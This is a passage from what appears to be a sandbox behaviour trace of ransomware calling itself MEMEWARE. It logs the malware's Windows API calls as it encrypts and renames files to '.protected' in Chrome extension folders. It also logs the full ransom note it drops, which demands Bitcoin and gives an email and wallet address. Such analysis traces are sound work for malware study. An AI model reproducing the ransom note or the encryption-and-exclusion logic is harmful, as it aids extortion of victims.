hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xef, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xef, lpOverlapped=0x0) returned 1 [0081.380] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.380] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.380] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.380] CloseHandle (hObject=0x168) returned 1 [0081.380] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.protected") returned 165 [0081.380] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.protected")) returned 1 [0081.381] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.381] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.381] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\RESTORE_FILES.txt") returned 159 [0081.381] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.381] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.381] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.382] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.382] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.382] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.382] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.382] CloseHandle (hObject=0x164) returned 1 [0081.382] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.382] lstrcmpiW (lpString1="el", lpString2="Windows") returned -1 [0081.382] lstrcmpiW (lpString1="el", lpString2="Program Files") returned -1 [0081.382] lstrcmpiW (lpString1="el", lpString2="Program Files (x86)") returned -1 [0081.382] lstrcmpiW (lpString1="el", lpString2="$Recycle.bin") returned 1 [0081.382] lstrcmpiW (lpString1="el", lpString2="System Volume Information") returned -1 [0081.383] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el") returned 141 [0081.383] lstrcmpW (lpString1="el", lpString2=".") returned 1 [0081.383] lstrcmpW (lpString1="el", lpString2="..") returned 1 [0081.383] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\*") returned 143 [0081.383] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.383] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.383] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.384] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.384] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.384] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.384] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\.") returned 143 [0081.384] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.384] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.384] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.384] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.384] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.384] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.384] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.384] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\..") returned 144 [0081.384] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.384] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.384] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.384] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.384] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.384] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.384] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.384] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.384] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json") returned 155 [0081.384] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.384] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.384] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.384] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.385] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json") returned 155 [0081.385] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.385] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json") returned 155 [0081.385] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.385] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json") returned 155 [0081.385] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.386] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x14c, lpOverlapped=0x0) returned 1 [0081.387] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.387] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x14c, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x14c, lpOverlapped=0x0) returned 1 [0081.387] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.387] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.387] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.387] CloseHandle (hObject=0x168) returned 1 [0081.387] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.protected") returned 165 [0081.387] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.protected")) returned 1 [0081.388] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.388] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.388] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\RESTORE_FILES.txt") returned 159 [0081.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.389] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.389] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.390] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.390] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.390] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.390] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.390] CloseHandle (hObject=0x164) returned 1 [0081.390] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.390] lstrcmpiW (lpString1="en", lpString2="Windows") returned -1 [0081.390] lstrcmpiW (lpString1="en", lpString2="Program Files") returned -1 [0081.390] lstrcmpiW (lpString1="en", lpString2="Program Files (x86)") returned -1 [0081.391] lstrcmpiW (lpString1="en", lpString2="$Recycle.bin") returned 1 [0081.391] lstrcmpiW (lpString1="en", lpString2="System Volume Information") returned -1 [0081.391] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en") returned 141 [0081.391] lstrcmpW (lpString1="en", lpString2=".") returned 1 [0081.391] lstrcmpW (lpString1="en", lpString2="..") returned 1 [0081.391] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\*") returned 143 [0081.391] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.391] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.391] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.391] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.391] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.391] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.391] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\.") returned 143 [0081.391] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.391] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.391] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.391] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.391] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.391] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.391] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.391] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\..") returned 144 [0081.391] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.391] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.391] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.391] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.392] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.392] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.392] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.392] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.392] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json") returned 155 [0081.392] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.392] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.392] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.392] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.392] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.392] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json") returned 155 [0081.392] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.392] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json") returned 155 [0081.392] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.392] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json") returned 155 [0081.392] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.392] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0081.393] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.393] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd7, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0081.393] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.393] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.394] WriteFile (in: hFile=0x168, 